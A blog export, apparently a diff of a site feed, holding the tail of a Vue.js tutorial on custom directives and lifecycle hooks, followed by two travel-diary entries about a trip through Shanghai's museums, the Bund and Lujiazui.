Custom directives, summarized:

1. Definition syntax
  • Local directives:
    • new Vue({directives: {directiveName: configObject}})
    • new Vue({directives: {directiveName: callback}})
  • Global directives (see the sketch below):
    • Vue.directive(directiveName, configObject)
    • Vue.directive(directiveName, callback)
2. The three common hooks in the config object:
  • bind: called when the directive is first bound to the element.
  • inserted: called when the host element is inserted into the page.
  • update: called when the template containing the directive is re-parsed.
3. Notes:
  • Define the directive without the v- prefix, but use it with v-.
  • Multi-word directive names must be kebab-case, not camelCase.

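A minimal sketch of the global form, registering the fbind logic from the example above with Vue.directive:

Vue.directive('fbind', {
  bind(element, binding) { element.value = binding.value },   // directive bound to the element
  inserted(element) { element.focus() },                      // element inserted into the page
  update(element, binding) { element.value = binding.value }  // template re-parsed
})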
XVII. Lifecycle

049 Lifecycle: Mounting

The lifecycle:

1. Also known as: lifecycle callbacks, lifecycle functions, lifecycle hooks.
2. What it is: a set of specially named functions that Vue calls for you at key moments.
3. The hook names are fixed; their bodies are yours to write as needed.
4. Inside a lifecycle hook, this is vm or the component instance.
    <div id="root">
    <!-- 完整写法:<h2 :style="{opacity: opacity}">欢迎学习 Vue</h2> -->
    <h2 :style="{opacity}">欢迎学习 Vue</h2>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    opacity: 0.75
    },
    // Vue 完成模板的解析并把真实的 DOM 元素放入页面后(挂载完毕)调用 mounted()
    mounted() {
    console.log('mounted', this)
    setInterval(() => {
    this.opacity -= 0.01
    if (this.opacity <= 0)
    this.opacity = 1
    }, 16)
    },
    })
    </script>

050 Lifecycle: Updating & 051 Lifecycle: Destruction

A Vue component's lifecycle falls into three broad phases: creation, updating, and destruction. Each phase comes with lifecycle hooks that let you run your own logic at that point.

052 Lifecycle Summary

张三's life (his "lifecycle"):

• About to be born
• (Important) Born → newborn checkup.
• Learns to talk
• Learns to walk
• ……
• ……
• (Important) About to pass away → settles his affairs
• Passed away

The life of vm (its lifecycle):

• About to be created → beforeCreate()
• Created → created()
• About to mount → beforeMount()
• (Important) Mounted → mounted()
• About to update → beforeUpdate()
• Updated → updated()
• (Important) About to be destroyed → beforeDestroy()
• Destroyed → destroyed()

The most-used hooks:

1. mounted(): kick off ajax requests, start timers, bind custom events, subscribe to messages, and other setup.
2. beforeDestroy(): clear timers, unbind custom events, unsubscribe from messages, and other teardown.

On destroying a Vue instance:

1. After destruction, Vue DevTools shows no information for it.
2. After destruction, custom events stop working, but native DOM events still fire.
3. Don't bother changing data in beforeDestroy(): even if you do, no update cycle will run.
    <div id="root">
    <!-- 完整写法:<h2 :style="{opacity: opacity}">欢迎学习 Vue</h2> -->
    <h2 :style="{opacity}">欢迎学习 Vue</h2>
    <button @click="stop">点我停止变换</button>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    opacity: 0.75
    },
    methods: {
    stop() {
    this.$destroy()
    }
    },
    // Vue 完成模板的解析并把真实的 DOM 元素放入页面后(挂载完毕)调用 mounted()
    mounted() {
    console.log('mounted', this)
    this.timer = setInterval(() => {
    this.opacity -= 0.01
    if (this.opacity <= 0)
    this.opacity = 1
    }, 16)
    },
    beforeDestroy() {
    clearInterval(this.timer) // 销毁 Vue 实例并不会销毁定时器
    },
    })
    </script>
    ]]>
@@ -247,7 +247,7 @@ /posts/Diary-%E6%B2%AA%E4%BA%86%EF%BC%88%E4%BA%8C%EF%BC%89/ - Preface
        

This is the second half of the Shanghai trip!

Main Text

11.6

07:55 Dishui Lake

The new area of Pudong New Area

Up and out early again. People's Square - Line 2 - Longyang Road - Line 16 - Dishui Lake, ¥10. An hour and a half; in that time a high-speed train could have delivered me to the Humble Administrator's Garden 😇.

This place is strikingly like Xiong'an New Area, and the cars around here almost all wear 沪C plates.

Changjiang-1000

The CJ-1000A is China's first commercial aero-engine product and the only domestic powerplant slated for the home-grown airliner. The name "长江" (Yangtze) marks the CJ-1000A as the pioneer of China's commercial aero-engine industry, symbolizing inexhaustible power flowing from a long source. "1000" denotes the thrust class of 10,000-19,999 kgf, and "A" designates the first model.

The big round lake

One strategy for building a "new area" is to dig a huge lake and create a handsome man-made landscape. According to the property developers, in 50 years this will be the center of Shanghai!

08:12 Shanghai Astronomy Museum 🤩

Said to be the hardest museum in all Shanghai to book

Even this far out of town, the crowds came.

12:07 Into the City

Shanghai villas

After the astronomy museum it was time to head into the city proper. Dishui Lake - Line 16 - Longyang Road - Line 2 - Century Park (overshot my stop, in fact), ¥9. This stretch left me feeling that even in Shanghai there are still large tracts of undeveloped land.

13:44 Pudong Bus 11

Odd street names

Having reached Pudong, with Lujiazui as the headline stop, I first squeezed in the Shanghai Animation Museum.

Meihua Road & Haitong Road - Pudong Bus 11 - Zhangjiang Road & Zuchongzhi Road, ¥2. New-area stop names and street names are always this odd...

13:48 Shanghai Animation Museum 🤩

Zhangjiang Drama Valley

The venue is smaller than the China Animation Museum, but I found its coverage broader.

    15:05 陆家嘴🤩

    上海著名建筑

    ​东方明珠广播电视塔,简称“东方明珠”,位于上海市浦东新区陆家嘴世纪大道 1 号,地处黄浦江畔,背拥陆家嘴地区现代化建筑楼群,与隔江的外滩万国建筑博览群交相辉映,1991 年 7 月 30 日动工建造,1994 年 10 月 1 日建成投入使用,是集都市观光、时尚餐饮、购物娱乐、历史陈列、浦江游览、会展演出、广播电视发射等多功能于一体的上海市标志性建筑之一。

    ​蹬个共享单车,然后广兰路-2 号线-陆家嘴。

    ​陆家嘴,到了,开左侧门。We are arriving at Lujiazui Station.(此处背景音乐 duang~duang~duang~)

    三件套

    ​调整一下视角,让注射器位于开瓶器和打蛋器中间的位置。

    ​上海环球金融中心占地面积 14400 平方米,总建筑面积 381600 平方米,拥有地上 101 层、地下 3 层 ,楼高 492 米,外观为正方形柱体。裙房为地上 4 层,高度约为 15.8 米。上海环球金融中心 B2、B1、2 和 3 层为商场、餐厅;7-77 层为办公区域(其中 29 层为环球金融文化传播中心);79-93 层为酒店;94、97 和 100 层为观光厅。

    ​上海金茂大厦占地面积 2.4 万平方米,总建筑面积 29 万平方米,其中主楼 88 层,高度 420.5 米,约有 20 万平方米,建筑外观属塔型建筑。裙房共 6 层 3.2 万平方米,地下 3 层 5.7 万平方米,外体由铝合金管制成的格子包层。金茂大厦 1-2 层为门厅大堂;3-50 层是层高 4 米,净高 2.7 米的大空间无柱办公区;51-52 层为机电设备层;53-87 层为酒店;88 层为观光大厅,建筑面积 1520 平方米。

    ​上海中心大厦主要用途为办公、酒店、商业、观光等公共设施;主楼为地上 127 层,建筑高度 632 米,地下室有 5 层;裙楼共 7 层,其中地上 5 层,地下 2 层,建筑高度为 38 米;总建筑面积约为 57.8 万平方米,其中地上总面积约 41 万平方米,地下总面积约 16.8 万平方米,占地面积 30368 平方米。

    世纪大道

    ​看了看网红的三件套高手位有点远,于是我决定 give up!去看一个有意思的地方。

    迪士尼旗舰店

    各色玩具

    见到祖宗了

    ​里面有我最喜欢的动漫人物!而且价格惊人🤧,原产地也就广东东莞,居然还是排队咔咔买,有钱の上海人。

    上海欢迎您!

    上海海洋水族馆

    ​14 年前曾到此一游!

    15:47 渡江

    望浦西

    坐个船船!

    ​腿去东昌路码头,送你回外滩码头!¥2。

    望浦东

    船头

    16:13 外滩-福州路🤩

    外滩

    ​白天的外滩也别有一番风景!

    外滩牛

    ​外滩“金融牛”是美籍意大利裔著名雕塑家阿图罗·迪·莫迪卡(Arturo Di Modica)于 2010 年在上海世博会开幕之际为外滩金融广场设计创作的。

    开始 city walk 福州路!

    ​上海租界自西向东有几条重要的道路:Nankin Road、Kiukiang Road、Hankow Road、Foochow Road 和 Canton Road,中文名分别是南京路、九江路、汉口路、福州路和广东路(本来是广州路,但广东和广州的英文名是一样的,就传跑偏了)。南京路是老外为了纪念《南京条约》签订而命名的,其他几条路对应的地名也都是当年要么设过租界、要么设过海关的地方。

    ​身为福州人,我选择走一走福州路!

    逛一逛这条路
    老上海著名妓院一条路
    福州路

    福州大楼

    ​福州大楼原名汉弥尔登大楼,1931 年开工,1933 年竣工。此楼分主楼和辅楼,辅楼称老大楼,六层,大门在福州路上,与主楼相连。主楼即新大楼,建筑面积 12294 平方米,公和洋行设计,新仁记营造厂施工。造型与风格乃是准现代派,中部 14 层,两翼 7-9 层。外观中凹,立面上多笔直的线条,看去简洁不紊,仅大门上顶层和塔楼有备案,属装饰艺术派。窗框除二楼和顶层正中三扇为卷形,余皆长方格形。大门用转门,门前上有两棚。底层外墙为花岗石,2 至 14 层为白水泥人造石。内部房间、走道、卫生间分别为硬木、人造大理石及马赛克地坪,大楼一部分为写字间出租,也有 66 套公寓客房以及停车间等。

    杏花楼

    外文书店

    ​当我高分考过六级后自以为英语水平应该不错了,于是自不量力地去外文书店整了本介绍外滩的英文书,£19.95,价格惊人,相当于 ¥200😅,然而里面的内容还是看得不太懂,只能看着图片知道大概意思。

    福建福州

    ​这是福建中路和福州路的交叉口!

    666

    ​这是福州路 666 号!

    上海市基督教教务委员会

    17:27 黄河路

    开躺!

    ​这天的行程结束了!

    ​香迷糊的国际饭店蝴蝶酥让我念念不忘,上网查了下可以去哈尔滨食品厂买个替代品,也可以叫奥乐齐超市的外卖,这样就可以规避贪吃蛇排队了!

    11.7

    06:39 煎饼果子

    药药切克闹

    ​看手法就觉得没有河北保定煎得流畅,但味道还蛮好的🤧。

    07:09 静安寺🤩

    静安寺

    ​静安寺,又称静安古寺,位于上海市静安区,其历史相传最早可追溯至三国孙吴赤乌十年(247 年),初名沪渎重元(玄)寺。宋大中祥符元年(1008 年),更名静安寺。南宋嘉定九年(1216 年),寺从吴淞江畔迁入境内芦浦沸井浜边(今南京西路),早于上海建城。静安寺总建筑面积达 2.2 万平方米,整个庙宇形成前寺后塔的格局,由大雄宝殿、天王殿、三圣殿三座主要建筑构成,是上海最古老的佛寺。寺内藏有八大山人名画、文征明真迹《琵琶行》行草长卷。静安区亦由静安寺而闻名于世。静安寺的建筑风格是仿明代以前的建筑风格,典型的代表就是斗拱的形制。

    多少楼台烟雨中

    ​据说是全中国最贵的寺庙,里面遍是黄金白银!进去要¥50,于是我决定就在外面转一转好了。

    左右门神

    不知道叫啥建筑

    07:58 光启南路

    上海老破小

    ​静安寺-7 号线-肇嘉浜路-9 号线-小南门,¥4。本来导航更推荐我 2 号线-世纪大道-9 号线-小南门,我看了下还得过江看着就蠢,于是我选择前者路线。

    ​还记得 14 年前住的地方叫做天意旅馆,位于复兴东路路口,光启南路内。故地重逢一下,全部拆迁了😷。

    08:13 城隍庙-豫园🤩

    城隍庙

    ​要走的时候再来看一看老上海吧!

    打蛋器下

    施工中

    ​¥10。结果看了个建筑工地🤧。里面基本都是老上海在拜拜拜?

    霍光大将军

    妈祖

    ​原来上海人也拜妈祖耶。

    豫园商城

    ​进豫园需要¥40,下次一定,简单地在旁边的商城里逛个街吧。

    豫园地铁站

    ​该坐地铁回去了!这个地铁站让我觉得 14 年前坐地铁时就是这个站,当时年幼的我看到这花里胡哨的玩意直接傻了😵,后面家里人根本不敢坐地铁,靠打车解决交通问题。

    ​豫园-14 号线-大世界-8 号线-人民广场,¥3。

    09:24 上海历史博物馆🤩

    跑马总会大楼

    ​上海市历史博物馆(上海革命历史博物馆),国家一级博物馆,位于上海市黄浦区南京西路 325 号(原上海美术馆),地处上海人民广场历史风貌保护区, 人民公园西侧,占地 10000 平方米,是全面综合反映上海 6000 年悠久地方历史及革命历史的地志性博物馆。

    ​趁还有一点点时间,再玩一个地方!

    ​一个比较冷门的博物馆,介绍着上海的历史(主要就是近代史了)。上海这个地方居然能有 6000 年的历史?

    西楼

    10:47 午饭

    排骨年糕+罗宋汤

    ​大包小包拎着准备回去了!最后吃一吃上海特色小吃排骨年糕¥25 + 罗宋汤¥15。感觉挺甜的。

    11:55 G1659

    遍地新冠病毒

    G1659

    ​人民广场-2 号线-虹桥火车站,¥5。

    ​本来计划得挺美的,G1659 12:55 上海虹桥-16:51 福州,¥386。只要 3 小时 56 分钟就到了,结果自己候车的时候下象棋,也可能是玩得太累了,就走神了没得上车,喜提人在囧途😭。

    13:15 G1635

    G1635

    ​查了下改签二等座得好晚才回去,再买的话相当于这张票直接作废了。只好改签一等座了 G1635 14:34 上海虹桥-19:06,¥644😭,亏了大几百,时间还更长一点。

    ​于是这回怕走神,直接提前半小时站检票口前了。

    14:31 一等座

    Reading English book

    ​喜提宽敞无比的一等座,直接把行李箱放腿前都没事😇。然后坐一等座的话还会送一包小零食和一瓶水,炫完了。

    15:40 浙江杭州

    钱塘江上潮信来,今日方知我是我

    ​平生不修善果,只爱杀人放火。忽地顿开金绳,这里扯断玉锁。

    16:18 浙江金华

    我要去浙江师范大学😭!

    16:47 浙江衢州

    浙江小别墅

    ​看来,不只是福建人喜欢盖小别墅。

    19:09 福建福州

    两个月回来了感觉也不热了

    ​好吧只是不这么热,其实还是挺热的!

    福州欢迎您

    ​啊!南后街!啊!西湖左海!啊!福州站!啊!江滨!啊!两塔!啊!福建博物院!

    火车站南广场

    ]]>
    @@ -276,7 +276,7 @@ /posts/Diary-%E6%B2%AA%E4%BA%86%EF%BC%88%E4%B8%80%EF%BC%89/ - 前言
            

    ​我终于把万恶的小论文搞定了😭!解决完小论文这个问题,就可以先回家去面对更多的问题……

    去哪中转溜达
    当两天沪✌先

    ​本次回家决定中转一下上海!

    ​本次行程参观了许多博物馆,由于博物馆中图片和文字量密集,如果把它们全部放在一张网页里,将会占据大量版面,还会影响加载速度!因此,我决定将博物馆的相关内容放在子文章中。

    ​对于我来说,排版游记文章花费的时间要比旅游的时间还要多……所以有时间慢慢弄吧。

    正文

    11.4

    07:24 金灿灿

    保定的秋天

    ​要走的这天,雾霾终于散去了。

    ​今年的银杏要比去年早黄了两周左右。

    09:07 大红门

    大红门

    ​正常来讲,这个“寒假”比两年前还要长一些。

    ​再见了保定!G2602 09:49 保定东-11:00 天津西,¥57.5。

    11:04 天津西

    我需要便捷换乘!

    ​第一次试着自己坐高铁换乘。下车后找《便捷换乘》的电梯,直接坐出去。

    11:07 塑料大棚

    曾风餐露宿一晚

    ​那些事情,已经过去了快两年,不是吗?

    ​大名鼎鼎的京沪高铁只过天津南而不过天津西……按照两年前的方法,再转个车直接到天津南。G2653 11:32 天津西-11:46 天津南,¥20。

    11:38 天津天际线

    看到天塔了!

    ​左边的高楼是天津现代城二期,339.6m,右边就是天塔了,415.2m。

    ​天津的城建还是很顶的。很可惜这几年天津一直是衰落的状态。

    ​耳机里一直单曲循环着《GTAV》里的 BGM《No Happy Endings》。游戏中出现这首歌的时候是崔佛发现麦克十几年前就背叛了自己,独自一人前往白雪皑皑的北洋克顿挖了麦克的假坟墓寻求真相。整首歌有着一股快节奏又有些空灵的气氛。而天津大学又称北洋大学,再看着天津逐渐远去的高楼,感觉还挺应景😅。

    11:39 巨大烂尾楼

    北方第一高

    ​这回近距离观察了世界第一高烂尾楼😅。

    ​在我心目中,一些城市有着代表性的颜色:

    • 北京是红色,庄严肃穆,中国红。
    • 天津是蓝色,濒临渤海湾,津城里的各个建筑也都以蓝色调为主。
    • 保定是灰色,天天可爱小雾霾,还有我读研时的各种痛苦经历😭。
    • 武汉是橙色,黄鹤楼和鹦鹉洲长江大桥,以及过早的烟火气息。
    • 上海是暗金色,之后逛的好几个场馆都把灯光压得很暗,夜晚的外滩也有种黑色的深沉和金色的华丽。
    • 福州是绿色,一年四季都不落叶的地方🤧。

    ​其他地方,诸如石家庄、南昌、广州、杭州等,倒是没有一种固定的色彩。

    11:46 进站直梯

    我需要在天津南换乘!

    ​两年前天津南的保安大叔不让我们便捷换乘,而是迫使我们出站测个核酸再进去😵。其实这个车站是有便捷换乘这个选项的。

    11:49 故地重游

    这就是天津南!

    ​感觉比保定东还要小的高铁站……

    候车中

    ​所乘车次:G11 12:33 天津南-16:38 上海虹桥,¥609(好贵啊!)。

    ​这里有想过能不能直接改签到 G129,还能早点到上海,后来又觉得还是休息一下吧。

    ​之前的 G325 通往福州的车次还在,这么久的车实在是太牢了。

    12:31 京沪高铁

    京沪大标杆

    ​也算是体验到了一把全中国最牛的高铁了,可惜没得靠窗的位置。这个高铁又称最具有班味的高铁,很多人估计坐这条线只是为了出差,在车上也得打开电脑办公。

    超高速!

    ​尽管车速已经拉满,而且中间只停靠省会济南和南京,但还是觉得时间漫长。

    13:30 山东济南

    百里黄河!

    ​乘高铁火车跨过黄河多次,这回总算被我抓拍到了~

    15:27 江苏南京

    饮马长江!

    ​公元 450 年,元嘉草草,封狼居胥,赢得仓皇北顾。北魏太武帝拓跋焘南伐刘宋,直逼建康,饮马长江😠👊!

    16:38 上海虹桥

    人挤人

    ​又是一个巨大站,出站出口都要排一会儿队。虽然上海虹桥站在全国高铁站里不算大的,但是虹桥机场跟它是连一起的,这加起来就 very 的 big 了。

    沪币警告!

    ​知道上海物价很高,也没想过会这么高😵,好吧这是在火车站里,我拒绝!还是到民宿附近解决晚饭问题吧。

    16:55 上海地铁

    四通八达

    ​纵横交错的上海地铁,你甚至可以乘地铁直接去拙政园!

    地铁站

    ​走了老长一会儿,从《虹桥 2 号航站楼》上的车而不是从《虹桥火车站》,这证明我走错路了😵。

    ​虹桥 2 号航站楼-2 号线-人民广场,¥5。

    17:49 解决晚饭

    虾仁水饺

    ​到民宿附近了。整了份虾仁水饺,没几粒¥28🥴,但是虾仁是饱满的。比火车站的要好一点,我可以接受!

    ​然后整了杯益禾堂,¥17。

    18:04 奇异建筑

    UFO?

    ​出来就被两座造型怪异的大楼吸引。

    ​国际饭店,于民国二十三年(1934 年)12 月 1 日建成投用,自竣工起至 1982 年为上海市最高建筑,其楼顶中心旗杆于 1950 年 11 月确定为上海城市测绘平面坐标原点。

    ​上海新世界丽笙大酒店由上海新世界股份有限公司投资兴建,由卡尔森环球酒店集团亚太公司管理,是其在中国管理的最大规模的“丽笙”品牌酒店。

    ​定的酒店位于黄河路 127 号,国际饭店楼下拐进去,三个晚上¥491.40,平均一个晚上¥163.8。房间很小,没窗户,但是有个洗衣机,我可以接受!

    ​国际饭店有卖西饼的地方,整个周围全是西饼奶油的味道,给我香迷糊了🤤。

    ​上海位于华东最东,天黑得可早,在酒店里洗了个澡躺一躺,差不多可以出去看看外滩了。

    19:23 闽菜

    新闽记

    ​坛起荤香飘四邻 佛闻弃禅跳墙来

    ​新闽记在保留古法传统技艺的前提下,食材甄选,烹调讲究,为食客呈现一道既充满情怀亦能代表闽菜文化的饕餮盛宴。

    ​新闽记甄选品质上乘的福建漳港海蚌,配以多种珍稀食材耗费数小时熬制上好的“三茸汤”,待上席时,煮沸的鸡汤当席汆鲜肉,即刻体验闽菜之“清淡鲜脆”“醇厚隽永”的至高味觉享受。

    ​看到一家闽菜馆,介绍的两种食物是我这个福建人基本没咋吃过的东西,这个闽菜之后更是听都没听说过😪。不过看这个文案,进去的客人得被狠狠宰一笔。

    19:27 南京路步行街🤩

    有点像江汉路

    ​又是一个到处卖东西的商业街了,想过这里人会很多,但还是比海心沙要好。

    ​这边有非常多的警察维持秩序。

    永安百货

    ​永安百货,简称永安,创办于 1907 年 6 月 28 日,是中国香港其中一家历史最悠久的连锁百货店,既是香港第二大华资百货公司,亦是早年上海南京路四大华资百货公司之一(当年先施公司、永安公司、新新公司和大新公司被合称为后四大公司)。

    上海时装商店

    ​上海时装商店(原先施公司)由德和洋行设计,是上海的“四大百货公司”之一,建筑整体为文艺复兴风格,装饰以巴洛克风格元素,现为上海时装商店。

    老凤祥银楼

    ​老凤祥是国内唯一由一个半世纪前传承至今的百年老店。上海老凤祥有限公司正是由创始于 1848 年的老凤祥银楼发展沿革而来,其商标“老凤祥”的创意,也源于老凤祥银楼的字号。

    慈安里大楼

    ​慈安里大楼位于上海市黄浦区南京东路 114 号,建于清光绪三十二年(1906 年),是 20 世纪外滩地段清水砖墙老大楼的典型代表之一,由英商爱尔德公司设计,采用法国文艺复兴风格。最初是上海的第一家百货公司,1999 年入选上海市第三批优秀历史建筑。

    东方明珠

    ​越靠近外滩,人越多。

    和平饭店

    The Palace Hotel

    ​和平饭店,原名华懋饭店,属芝加哥学派哥特式建筑。饭店位于上海的南京东路和外滩的交叉口。1929 年,犹太商人 Victor Sassoon 构思并创建了名为“华懋饭店 (Cathay Hotel)”的酒店,这就是后来的和平饭店。

    19:51 外滩系列🤩

    挤出来了!

    ​离开了老上海,映入眼帘的是浦东新上海!

    南京东路口

    ​外滩十八号,位于上海市外滩南京路口,原为英国渣打银行驻中国的总部。原名麦加利银行的外滩十八号,建于 1923 年。

    The Palace Hotel

    ​和平饭店南楼整体外观集中体现了文艺复兴形式,将英国维多利亚风格的砖砌效果与维多利亚后期的安妮女王复兴风格糅合在一起,红砖饰带和楣式的处理手法表现了建筑师对变化与动感的追求,以色彩和材质的对比达到装饰效果。

    字林西报大楼旧址(左)

    The North China Daily News Building

    ​字林西报大楼于 1923 年竣工(1951 年改名为桂林大楼),曾是当年外滩最高的大楼。《字林西报》的前身是创刊于 1850 年 8 月 30 日的英文《北华捷报》,为中国境内第一份新闻报纸,创办人是英国来沪的拍卖商奚尔门。

    和平饭店:北楼

    The Palace Hotel

    ​和平饭店北楼立面处理表现了装饰艺术风格,整体仅以竖向线条作为装饰主体,在檐部及基座部分使用抽象几何形装饰母题,并在各入口处、檐部正中等处,用反映业主身份的沙逊家族猎狗族徽作为装饰中心;外墙除第 9 层和顶部用泰山石面砖外,其余各层均用花岗石作贴面;在金字塔顶的周围还有四个非洲原始部落图腾似的装饰物。

    江海关

    ​读研三年成功打卡旧中国时期最有名的三个海关大楼:江汉关、粤海关和江海关!

    The Custom House

    ​海关大楼位于中山东一路 13 号,于 1925 年 12 月 15 日奠基,1927 年 12 月 19 日启用。这幢建筑占地面积为 5000㎡,建筑面积为 32500㎡,采用简化的新古典主义风格,其体量感带有现代建筑的一些影响。海关大楼与汇丰银行大楼共同构成外滩建筑天际线构图的一个中心,成为外滩建筑群中两幢最有代表性的建筑。

    老-陆家嘴
    新-陆家嘴

    一十四年

    ​十四年后,陆家嘴的高楼大厦更密集了!

    ​当时的老照片居然没有往右边多拍一点……

    ​PS 调色用的 Camera Raw 滤镜参数:曝光 -0.40、对比度 +70、高光 +26、阴影 -43、白色 -21、黑色 -5、纹理 +7、清晰度 +3、去除薄雾 +21。

    东方明珠与三件套

    ​尽管东方明珠实际上并没有环球金融中心和上海中心大厦高,但是由于透视关系,东方明珠还是显得更高些。

    浦东发展银行大楼

    The Hongkong and Shanghai Bank Building

    ​汇丰银行大楼,原指香港上海汇丰银行于 1923 年至 1955 年在上海的分行大楼,位于上海外滩 12 号,又名市府大楼,今天是上海浦东发展银行的总部驻地。1921 年 5 月 5 日大楼开工,1923 年 6 月 23 日建成,被认为是中国大陆近代西方古典主义建筑的最高杰作。大楼的设计者是著名的英资建筑设计机构公和洋行(Palmer & Turner Architects and Surveyors)。

    皇冠大楼!

    The Great Northern Telegraph Company Building

    ​大北电报公司大楼,位于上海市中山东一路 7 号,为外滩风景线的组成部分之一。大楼所在土地,最初为美商旗昌洋行所有,后转入轮船招商局名下,大北电报远东公司则租借土地的使用权兴建该楼。1949 年以后,大楼为长江航运管理局所使用,泰国盘古银行上海分行为该建筑的使用者。大楼建于 1906 年,翌年建成,为欧洲文艺复兴建筑式样,1994 年该建筑入选上海市优秀历史建筑名录。

    The Westin Bund Center Shanghai

    ​上海威斯汀大饭店,坐落于举世闻名的上海外滩,楼高 26 层,由万豪国际酒店集团公司进行管理,2400 平方米的酒店大堂是上海少有的超五星级酒店大堂之一,挑高 26.5 米的大堂中庭气宇轩昂,其中连接 4 个楼层的玻璃天梯更为匠心独具。

    The China Merchants Steam Navigation Company Building

    ​轮船招商局简称“招商局”,是中国近代史上第一家轮船运输企业,也是中国第一家近代民用企业,是由李鸿章发起的“官督商办企业”。企业由商人出资,合股的资本为商人所有,公司按照自己的规范章程制度管理。企业在政府监督之下,但是盈亏全归商办,与官无涉。

    大北电报公司大楼

    中国通商银行大楼

    The Russell & Co. Building

    ​中国通商银行大楼(外滩)是中国通商银行在上海外滩 6 号建造的银行大楼。中国通商银行是中国人创办的第一家银行,成立于 1897 年 5 月 27 日,创办人是盛宣怀;该行开创时参照英商汇丰银行的管理办法,成立之初,国家即授予其发行银元、银两的特权。外滩 6 号原来是一家拍卖行,3 层殖民地式建筑,1906 年翻建,由英资玛礼逊洋行的格兰顿(F. M. Gratton)设计,建筑面积 4541 平方米,建筑风格为仿哥特式市政厅式样,顶部有一排尖顶。

    最后两套!

    The McBain Building

    ​亚细亚大楼位于上海市延安东路外滩,中山东一路 1 号,上海解放后由上海市冶金设计院使用,一般也叫“冶金设计院大楼”,而年纪稍大的人仍习惯称它为“亚细亚大楼”。此楼建成于 1916 年,高 7 层,是当时外滩最高的一幢建筑,且又取得中山东路 1 号的门牌,故当时也有人称它为“外滩第一楼”。

    The Shanghai Club

    ​上海总会大楼是上海外滩建筑群中的一座著名建筑,位于上海外滩 2 号。上海总会是英国在沪侨民的俱乐部,一个重要的社交场所,创设于 1861 年,1864 年建楼。1909 年在原址建 6 层新楼,1910 年 1 月启用。新楼占地 1811 平方米,建筑面积 9280 平方米。建筑立面为三段式处理,2-3 层中部有 6 根爱奥尼柱式的石柱,顶端各设置了巴洛克式的风亭,细部雕刻细腻优美。建筑设计师是 H. TARRANT。室内装潢由马海洋行的日本建筑师下田菊太郎设计,装饰华丽,以长达 34 米的黑白大理石酒吧柜台著称。

    20:27 豫园商城-夜

    卖东西了!

    ​本来是想直接沿着九江路回去的,结果发现走远了,找一个就近的地铁站,豫园站。

    ​看小红书说晚上的豫园很好看,结果根本就没开门😅,估计是想说这个豫园商城吧。看上去全是崭新的仿古建筑。

    三吴之地

    ​上海也是个江南地区。这个灯打在传统苏式建筑上显得魔幻😵‍💫。

    20:56 国际饭店

    不排队了,但还是香迷糊了

    ​豫园-14 号线-大世界-8 号线-人民广场,¥3。

    ​该回酒店再洗个澡开躺了!发现国际饭店西饼屋门口都没人了,这才发现人家已经下班了😵。

    ​看了下到底是个啥玩意会引得这么多人排队?

    温馨提示

    尊敬的消费者

    上海国际饭店帆声西饼屋生产的一系列食品长期以来一直受到消费者的喜爱和认可,为此饭店表示衷心的感谢!由于蝴蝶酥等明星产品已成为市民、消费者竞相购买的热卖产品,为了提升您的购物体验度,饭店特此温馨提示如下:

    1. 请消费者有序排队,不要拥挤,严禁插队现象发生;
    2. 黄河路 28 号帆声西饼屋是国际饭店唯一官方门店。除此以外,饭店在奥乐齐超市、永安百货、汇金百货、邵万生、三阳、新长发、老同盛等专柜均有饭店提供的蝴蝶酥等相关产品同步售卖。在此,提醒广大消费者请认准正规渠道购买国际饭店生产的蝴蝶酥等产品。
    3. 如发现不合理现象,可向我们门店及时反映,我们将与您共同营造一个温馨、有序、良好的购物环境。

    11.5

    06:28 十里香馄饨王

    老上海福建馄饨

    ​黄河路一条路基本都是吃的,找了家馄饨店解决早饭问题,¥14。扫码时发现这是个福建馄饨店。

    ​记得 14 年前每次都在光启南路的馄饨店吃早饭,当时那个老板也是福建的来着。

    明天广场

    ​明天广场既有商业用房、公寓、酒店、商场、风味餐厅,又有会议中心、宴会厅和健康设施,五十七至五十八层还设置为总统套房,是上海第六高的摩天大楼。地上 60 层,地下 3 层,高约 285 米,于 2003 年 10 月 1 日落成。

    ​上海 03 年的房子放到现在的河北都是第一高楼了……

    ​本来第一站是要去徐汇的游戏博物馆的,但是要 10 点才开门,于是我决定先去南边的世博园打发下时间。

    07:10 世博园系列🤩

    世博园地铁站

    ​人民广场-8 号线-中华艺术宫,¥3。

    ​世博园地铁站还挂着当年世博会的照片和画。

    世博源

    ​世博会的场馆基本都拆得差不多了,走马观花地看一些特别的场馆吧。

    中国馆

    ​中华艺术宫选址 2010 年上海世博会中国馆,总建筑面积达到 16.68 万平方米,拥有展示面积近 7 万平方米,共分为 6 个展示层面、35 个展厅,分别为 60 米层、49 米层、41 米层、33 米层、5 米层和 0 米层。中华艺术宫拥有 1.4 万件馆藏品,首批展出 1400 多件。中华艺术宫的艺术品分类由国画、油画、书法、版画、雕塑、皮影等组成。

    ​之后我想骑个共享单车去看卢森堡展馆,为什么呢?因为有了瓶醋想包一盘饺子。

    过气网红

    ​甚至已经掉色严重。

    梅赛德斯·奔驰中心

    ​还以为是当年大名鼎鼎的沙特馆,查了下并不是。

    大克鼎

    ​还以为是国博里的大盂鼎,查了下并不是,应该是上海博物馆镇馆之宝大克鼎。

    老-卢森堡大公国世博馆
    新-卢森堡大公国世博馆

    卢森堡大公国世博馆

    ​骑了这么久,就为了拍这张照片!

    ​曾经的世博园人挤人,现在周围一个人都没有。本来想找个人帮我拍一张的,只好拿矿泉水瓶把手机架在椅子上录像截屏了。

    世博园地图

    ​这附近一个地铁站也没有,只好硬着头皮走去最近的后滩站了。

    意大利馆、法国馆、俄罗斯馆

    卢浦大桥

    ​卢浦大桥后的上海中心大厦。

    温室花园

    08:34 要上班了!

    一股班味

    ​OK,终于腿到地铁站了!后滩站-7 号线-肇嘉浜路-9 号线-漕河泾开发区,¥4。

    ​到了上班高峰,地铁里的人开始多了起来,但看着没有北京广州那么夸张。

    08:56 Welcome to CHJ

    全是办公楼!

    ​一股闽侯高新区的感觉……

    08:57 中国音数协游戏博物馆🤩

    新研大厦

    ​这个博物馆居然要 10:00 才开门,还是来早了😵。在旁边看个纪录片休息一下吧。

    花里胡哨

